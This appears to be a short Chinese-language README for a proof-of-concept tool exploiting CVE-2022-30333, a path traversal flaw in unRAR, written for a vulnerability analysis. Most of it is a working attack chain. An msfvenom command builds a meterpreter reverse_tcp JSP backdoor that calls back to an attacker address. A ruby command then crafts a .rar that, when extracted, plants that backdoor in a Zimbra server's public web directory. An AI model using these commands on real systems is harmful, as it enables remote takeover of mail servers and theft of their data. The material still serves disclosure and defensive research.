CVE-2022-30333 的概念验证——unRAR 6.11 之前版本中的一个路径遍历漏洞。我创建这个工具是为了在 AttackerKB 的分析文章中演示该漏洞,并希望尽快将其整合到 Metasploit 模块中!
基本上,你提供一个目标路径(包含路径遍历)和一些文件数据,这个工具会生成一个 .rar 文件,解压时会将文件提取到指定位置。最大文件长度为 104 字节,文件内容最大为 4096 字节。(这不是漏洞本身的限制,只是我生成文件时选择的数值)。
例如,使用 msfvenom 生成一个后门:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
然后创建一个 .rar 文件,将 .jsp 文件放置在某个有趣的位置:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar